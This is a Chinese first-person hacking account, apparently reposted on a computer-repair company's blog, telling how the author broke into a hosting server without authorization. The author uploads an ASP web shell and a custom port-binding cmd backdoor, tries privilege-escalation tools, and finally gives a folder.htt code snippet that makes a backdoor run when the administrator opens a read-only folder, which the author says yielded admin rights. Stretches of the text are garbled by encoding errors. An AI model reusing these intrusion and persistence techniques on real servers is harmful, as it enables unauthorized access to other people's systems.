一次获得管理员权限的艰难经历
在一次描扫中,隅然失掉了一个FTP的用户和暗码,进去一看,有许多网页文件。估计是一个假造主机用户。即然曾经失掉一个用户了,就想进去看看主机里到底有点什么东西(人的好奇心就是重)。先把它的主页index.asp下载下来打开,在里面找到了这个假造用户的域名(www.xxxx.com)。然后上传了个海阳顶端ASP木马程序(这个ASP木马不错,功能许多)上去,用www.xxxx.com/xp.asp试了一下,哈哈!能用,看来办理员的程度不怎么样,没有对wscript.shell、shell.application等危险的角本对象作限定,拿它的admin看来有希望了。
虽然曾经有一个shell,但是这个shell是web的,着实是不好用,所以我们首先要失掉一个DOS下的shell。于是传了个winshell后门上去,但是一运转文件就不见了,看来是被杀毒软件给杀失了,看来流行的后门是不能用了。现成的不能用,那我们就自己编吧,打开我的C++,调出了很久前自己写的一个后门,功能很简略就只是绑定一个cmd到指定的端口(不外曾经足够用了),编好后,上传、运转,一切OK,成功连接!着实杀毒软件也只能难为那些只懂用点现成东西的“小黑客”们。对付那些?
喑痰暮诳透呤郑ū鹞蠡幔也皇歉呤种皇嵌坏愕惚喑潭选#├此凳敲挥杏玫模灰姹愀囊幌略创耄嘁牒螅倍救砑透静椴怀隼戳恕G装摹靶『诳汀泵桥ρ氨喑贪伞?br>现在我们终于失掉了一个DOS下的shell(还真不容易),这下就方便多了。但是现在我们只要guest权限。我们的目标是拿到admin。所以接下来的事情是提拔我们的权限。传了一个ErunAsX.exe上去,晕!一传上去就不见了,看来又是被杀失了。换一个吧,ptsec.exe这个应该不会被杀。上传成功,没有被杀。在下令行输入:
C:\>ptsec.exe /di
提示提拔权限失败。
晕~~晕~~晕~~~!可能是打了SP3或是SP4了。接下来又试了好几个提拔权限的东西,不是被杀,就是提拔失败。看来用提拔权限东西是不行了。(也许是我程度菜,朋侪们有什么提拔权限的好东西,请告诉我。QQ:13865333)
虽然受挫,我们也不能如许就放弃了。要想做黑客就要得有点百折不饶、不达目的势不罢修的精神,西方不亮,西方亮,我们再想别的方法看看。
放一个后门进 “C:\Documents and Settings\Administrator\「开端」菜单\程序\启动”碰运气,如果可以的话,等办理员重起办事器,后门就可以以办理的身份运转了。r>妈的!不行,回绝访问!这黑客还真是难做!
修正注册表碰运气!
,以gues
t方法,用regedit /s filename.reg 在本机试了一下,照旧不行,虽然guest是可以修正注册的,但是它挂在注册表run项中的程序,下次启动照旧以guest启动的,并且还要以guest 登录才行。
难道就真的黩妒技穷了,在这“走投不路”之时,我忽然起了,前段工夫有个朋侪跟我说过可以用desktop.ini和folder.htt来启动程序,这个方法应该可行(新高兴时光病毒就是用的这种方法)。不管怎样只要有一线希望,我们就要试一下。
desktop.ini和folder.htt这两个文件是windows体系目录(web表现方法)的设置装备摆设文件,险些在每个目录里都有,但是一样平常情况下是隐蔽看不见的,要让它们可见必需修正目录菜单,“东西->文件夹选项->查看”中的内容。如图:
把“隐蔽受保护的操作体系文件(保举)”这一项上的“勾”去失。
下面我们把c:\winnt目录中的desktop.ini 和folder.htt(注意:每种差别目录下的desktop.ini和folder.htt文件都是差别的,所以肯定要是winnt目录下的。)复制出来,用记事本打开folder.htt文件把下面的代码加在最前面:
run_exe="WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"后门名.exe#version=1,1,1,1\">"
run_exe+=""
run_exe+=""
document.open();
document.clear();
document.writeln(run_exe);
document.close();
把其中的“后门名.exe”改为你想要启动的后门名称。
现在我们只要把desktop.ini、folder.htt和后门程序,放在统一个只读目录(记着肯定要是只读目录,并且最好是办理员经常进去的)下,当办理员打开这个目录,后门程序就会主动失掉运转。所以,在此提醒办理员们不要随便打开目录,如果要打开,先看一下目录的属性,不要设置只读属性的目录(着实windows体系下的只读目录没什么用处,以guest身份就可以对?
卸列矗褂芯褪且谩笆褂脀indows传统气势派头的文件夹”的方法!
来欣赏目
录。如下图:
接下来的题目是怎样找到一个只读目录呢?方法很简略,只要在下令行打入:
D:\>dir /ar
2002-04-01 15:28
wwwok
0 个文件 0 字节
1 个目录 1,488,887,808 可用字节
D:\>
只读目录就会列出来了。
运气不错,找到了一个叫wwwok的只读目录,并且这个照旧假造用户的总目录,办理员肯定会经常来的。
我把desktop.ini、folder.ini和一个很好的后门(以办事启动,不会被杀的)放了进去。
皇天不负有心人,两天之后,我的后门程序终于失掉了实行,成功的拿到了办理员权限。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
